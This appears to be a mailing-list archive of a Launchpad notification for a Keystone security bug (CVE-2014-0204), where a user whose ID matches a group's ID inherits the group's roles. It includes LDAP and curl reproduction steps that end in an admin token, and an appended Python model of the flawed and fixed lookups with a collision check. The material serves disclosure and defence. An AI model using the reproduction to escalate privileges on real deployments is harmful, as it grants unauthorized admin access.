
yahoo-eng-team team mailing list archive

[Bug 1309228] Re: [OSSA 2014-015] User gets group auth if same id (CVE-2014-0204)

 

** Changed in: keystone/icehouse
       Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1309228

Title:
  [OSSA 2014-015] User gets group auth if same id (CVE-2014-0204)

Status in OpenStack Identity (Keystone):
  Fix Committed
Status in Keystone icehouse series:
  Fix Released
Status in OpenStack Security Advisories:
  Fix Released

Bug description:
  
  If a user has the same ID as a group and that group has roles granted to it, the user gets the roles (even if they're not in the group).

  Note that Keystone typically assigns IDs and with uuid4 you're not
  going to get a user with the same ID as a group, but some setups use
  LDAP so the IDs come from the LDAP entries.

  Here are instructions on how to recreate:

  1) Start with LDAP system (set up with devstack)

  2) Create a user with an id of suspectid

  $ ldapadd -D "cn=Manager,dc=openstack,dc=org" -w "ofs5dac"

  dn: cn=suspectid,ou=Users,dc=openstack,dc=org
  objectclass: inetorgperson
  sn: suspect
  userPassword: blkpwd

  3) Create a group with an id of suspectid

  $ ldapadd -D "cn=Manager,dc=openstack,dc=org" -w "ofs5dac"

  dn: cn=suspectid,ou=UserGroups,dc=openstack,dc=org
  objectclass: groupOfNames
  ou: suspect
  member: cn=dumb,dc=nonexistent

  $ openstack --os-identity-api=3 --os-auth-url http://localhost:5000/v3 group list

  4) Grant a role to the group on a project

  $ openstack --os-identity-api=3 --os-auth-url http://localhost:5000/v3 role add --group suspect --project demo admin

  5) Get a token as the user, notice that the user has the group's
  access.

  
  $ curl -s \
    -H "Content-Type: application/json" \
    -d '
  { "auth": {
      "passwordCredentials": {
        "username": "suspect",
        "password": "blkpwd"
      },
      "tenantName": "demo"
    }
  }' \
    http://localhost:35357/v2.0/tokens | python -m json.tool

  ---

              "roles": [
                  {
                      "name": "admin"
                  }
              ],

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1309228/+subscriptions
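The defect the report describes, modelled as a small Python example. This is an editor's illustration and not Keystone's own assignment backend or its fix: the row shape (type, actor_id, target_id, role_id), the ids "suspectid", "alice", "bob", "admins", the project "demo" and the group memberships are all constructed for the demonstration. The vulnerable lookup keys role assignments on actor_id alone, so a group row whose id collides with the user's id is treated as the user's own; the corrected lookup matches on the (type, actor_id) pair, which is the condition that keeps a non-member from inheriting a same-id group's roles while a genuine member still does. A collision check an LDAP operator could run over the id attributes is included as well.

```python
"""Model of the role lookup behind CVE-2014-0204 (editor's illustration,
not Keystone's code).  Rows mirror the shape of a role-assignment table:
(type, actor_id, target_id, role_id).  All data below is constructed."""
from dataclasses import dataclass

USER_PROJECT = "UserProject"
GROUP_PROJECT = "GroupProject"


@dataclass(frozen=True)
class Assignment:
    type: str       # USER_PROJECT or GROUP_PROJECT
    actor_id: str   # a user id or a group id, depending on type
    target_id: str  # project id
    role_id: str


# Constructed sample rows: the group "suspectid" holds admin on "demo";
# the user "suspectid" has no direct assignment and is not a member.
ASSIGNMENTS = [
    Assignment(GROUP_PROJECT, "suspectid", "demo", "admin"),
    Assignment(GROUP_PROJECT, "admins", "demo", "admin"),
    Assignment(USER_PROJECT, "alice", "demo", "member"),
]

# Constructed directory memberships: group id -> set of member user ids.
GROUP_MEMBERS = {
    "suspectid": set(),      # the suspect group has no real members
    "admins": {"bob"},
}


def groups_of(user_id):
    """Group ids the user actually belongs to."""
    return {gid for gid, members in GROUP_MEMBERS.items() if user_id in members}


def roles_for_user_vulnerable(user_id, project_id, assignments=ASSIGNMENTS):
    """Defective lookup: matches on actor_id only, ignoring the row type.

    A group row whose actor_id equals user_id is returned even though the
    user is not a member of that group.
    """
    actor_ids = {user_id} | groups_of(user_id)
    return {a.role_id for a in assignments
            if a.target_id == project_id and a.actor_id in actor_ids}


def roles_for_user_fixed(user_id, project_id, assignments=ASSIGNMENTS):
    """Corrected lookup: a row counts only if its type matches the actor."""
    group_ids = groups_of(user_id)
    roles = set()
    for a in assignments:
        if a.target_id != project_id:
            continue
        if a.type == USER_PROJECT and a.actor_id == user_id:
            roles.add(a.role_id)
        elif a.type == GROUP_PROJECT and a.actor_id in group_ids:
            roles.add(a.role_id)
    return roles


def find_id_collisions(user_ids, group_ids):
    """Operator check for LDAP-backed deployments: ids used by both a user
    entry and a group entry (e.g. the same cn under two OUs)."""
    return sorted(set(user_ids) & set(group_ids))


if __name__ == "__main__":
    print(roles_for_user_vulnerable("suspectid", "demo"))  # {'admin'}
    print(roles_for_user_fixed("suspectid", "demo"))       # set()
    print(roles_for_user_fixed("bob", "demo"))             # {'admin'}
    print(find_id_collisions(["suspectid", "alice", "bob"],
                             ["suspectid", "admins"]))     # ['suspectid']
```

Running the block shows the vulnerable lookup handing "suspectid" the group's admin role while the fixed lookup returns nothing for that user and still returns admin for "bob", who really is in "admins". The same id check, run against the cn values of the Users and UserGroups subtrees, is a quick way to find whether a deployment was exposed before upgrading.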